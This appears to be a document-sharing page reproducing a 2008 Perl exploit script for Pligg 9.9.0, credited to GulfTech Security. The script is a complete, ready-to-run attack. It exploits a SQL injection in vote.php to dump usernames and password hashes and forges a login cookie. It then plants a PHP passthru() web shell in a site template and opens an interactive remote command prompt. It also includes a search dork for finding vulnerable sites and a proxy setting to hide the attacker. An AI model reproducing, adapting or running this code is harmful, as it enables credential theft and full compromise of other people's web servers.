Pligg 9.9.0 Remote Code Execution Exploit by h3m4n

VIEWS: 537 PAGES: 4

									                                             Pligg 9.9.0 Remote Code Execution Exploit                                           Page 1/4
   1   #!/usr/bin/perl −w
   2   use LWP::UserAgent;
   3   use MIME::Base64;
   4   use Digest::MD5 qw(md5_hex);
   5   use Getopt::Std; getopts(’h:’, \%args);
   6
   7   print   "#############################################\n";
   8   print   "# Pligg <= 9.9 Remote Code Execution Exploit \n";
   9   print   "#############################################\n";
  10   #dork   = "Powered By Pligg" + "Legal: License and Source"
  11
  12   # Proxy address
  13   $ENV{http_proxy} = ’http://127.0.0.1:8118/’;
  14
  15   my $http = LWP::UserAgent−>new;
  16      $http−>agent(’Mozilla/5.0 (Windows; U; Windows NT 5.1; en−US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1’);
  17      #$http−>env_proxy(); # <−− uncomment for proxy
  18      $http−>cookie_jar({});
  19
  20   my   $host   =   $args{’h’} || usage(); # Host flag. Specify the Pligg root directory
  21   my   $user   =   undef;
  22   my   $pass   =   undef;
  23   my   $file   =   undef;
  24   my   $data   =   undef;
  25   my   @auth   =   undef;
  26
  27   # Details for the php code that is injected in to the template
  28   my $ereg = ’<cmdout>(.*?)<\/cmdout>’;
  29   my $cvar = ’cmd’;
  30   my $cval = ’pwd;id’;
  31   my $code = ’<cmdout><?php if ( !empty($_REQUEST["’ . $cvar . ’"]) ) passthru($_REQUEST["’ . $cvar . ’"]); ?></cmdout>’;
  32
  33   print "[*] Checking if a shell already exists ...\n";
  34
  35   $data = $http−>post(
  36   $host . ’/index.php’,
  37   [
  38       $cvar => $cval
  39   ]);
  40
  41   if ( $data−>content =~ /$ereg/si )
  42   {
  43           print "[*] Found existing shell ...\n";
  44   }
  45   else
  46   {
  47           print "[!] No existing shell found ...\n";
  48
  49              #############################################
  50              # Gather user info via vote.php SQL Injection
  51              #############################################
  52

GulfTech Security                                                                                                                07/30/2008
                                         Pligg 9.9.0 Remote Code Execution Exploit                                                Page 2/4
  53            $data = $http−>post(
  54            $host . ’/vote.php’,
  55            [
  56                ’id’ => ’−99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users −− /*’,
  57               ’md5’ => ’d41d8cd98f00b204e9800998ecf8427e’ # <−− If you aren’t logged in this always works
  58            ]);
  59
  60            print "[*] Gathering user information ...\n";
  61
  62            if ( $data−>content =~ /(.*?):([a−f0−9]{1,64})/i )
  63            {
  64                    $user = $1;
  65                    $pass = $2;
  66
  67                     # Sets up the cookie to authenticate us
  68                     @auth = (’Cookie’ => ’mnm_user=’ . $user . ’; mnm_key=’ . encode_base64($user . ’:’ . crypt($user, 22) .
        ’:’ . md5_hex($pass)) . ’;’);
  69
  70                       print "[+] Got user ’$user’ ...\n";
  71
  72            }
  73            else
  74            {
  75                       print "[!] Unable to get user info. Dumping output ...\n";
  76                       open(ELOG, ’>pligg_debug.html’);print ELOG $data−>content;close(ELOG);
  77                       exit;
  78            }
  79
  80            #############################################
  81            # Get the template path
  82            #############################################
  83
  84            print "[*] Gathering template information ...\n";
  85
  86            $data = $http−>get($host . ’/admin_editor.php’,@auth);
  87
  88            if ( $data−>content =~ />(.*?)<\/option>/i )
  89            {
  90                    $file = $1;
  91                    # Quick and dirty fix
  92                    $file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/;
  93                    print "[+] Got template file [$file]...\n";
  94            }
  95
  96            #############################################
  97            # Read the template contents
  98            #############################################
  99
  100           $data = $http−>post(
  101           $host . ’/admin_editor.php’,
  102           [
  103              ’the_file’ => $file,
GulfTech Security                                                                                                                 07/30/2008
                                       Pligg 9.9.0 Remote Code Execution Exploit                  Page 3/4
  104               ’open’ => ’Open’
  105         ]
  106         ,@auth);
  107
  108         print "[*] Reading template data ...\n";
  109
  110         # Grab the template contents
  111         if ( $data−>content =~ /<textarea(.*)>(.*)<\/textarea>/is )
  112         {
  113                 $temp = $2;
  114                 $temp =~ s/&gt;/>/ig;
  115                 $temp =~ s/&lt;/</ig;
  116                 $temp =~ s/&quot;/"/ig;
  117                 $temp =~ s/&amp;/&/ig;
  118
  119                    print "[+] Got template data ...\n";
  120         }
  121         else
  122         {
  123                    print "[!] Unable to get template data. Dumping output ...\n";
  124                    open(ELOG, ’>pligg_debug.html’);print ELOG $data−>content;close(ELOG);
  125                    exit;
  126         }
  127
  128         #############################################
  129         # Update the Template Contents
  130         #############################################
  131
  132
  133         $data = $http−>post(
  134         $host . ’/admin_editor.php’,
  135         [
  136            ’the_file2’   => $file,
  137            ’updatedfile’ => $temp . $code,
  138            ’save’          => ’Save+Changes’
  139         ]
  140         ,@auth);
  141
  142         print "[*] Updating template data ...\n";
  143
  144         if ( $data−>content =~ /File Saved/is )
  145         {
  146                 print "[+] File saved!\n";
  147         }
  148         else
  149         {
  150                 print "[!] Unable to update template data. Dumping output ...\n";
  151                 open(ELOG, ’>pligg_debug.html’);print ELOG $data−>content;close(ELOG);
  152                 exit;
  153         }
  154   }
  155

GulfTech Security                                                                                 07/30/2008
                                              Pligg 9.9.0 Remote Code Execution Exploit     Page 4/4
  156   #############################################
  157   # Setting up the php shell
  158   #############################################
  159
  160   print "[*] Setting up shell ...\n";
  161
  162   $data = $http−>post(
  163   $host . ’/index.php’,
  164   [
  165       $cvar => $cval
  166   ]);
  167
  168   if ( $data−>content =~ /<cmdout>(.*?)<\/cmdout>/si )
  169   {
  170           while ( 1 )
  171           {
  172                   print "pligg:~#";
  173                   $exec = <STDIN>;
  174
  175                         $data = $http−>post(
  176                         $host . ’/index.php’,
  177                         [
  178                             $cvar => $exec
  179                         ]);
  180
  181                         if ( $data−>content =~ /$ereg/si )
  182                         {
  183                                 print $1 . "\n";
  184                         }
  185                         else
  186                         {
  187                                 print "Unexpected Response!\n";
  188                         }
  189              }
  190   }
  191   else
  192   {
  193              print "[!] Unable to set up shell ...\n";
  194              open(ELOG, ’>pligg_debug.html’);print ELOG $data−>content;close(ELOG);
  195              exit;
  196   }
  197
  198   sub usage
  199   {
  200           print "pligg_exploit.pl −h http://path/to/pligg   \n";
  201           exit;
  202   }
  203
  204   # milw0rm.com [2008−07−30]



GulfTech Security                                                                           07/30/2008

								
To top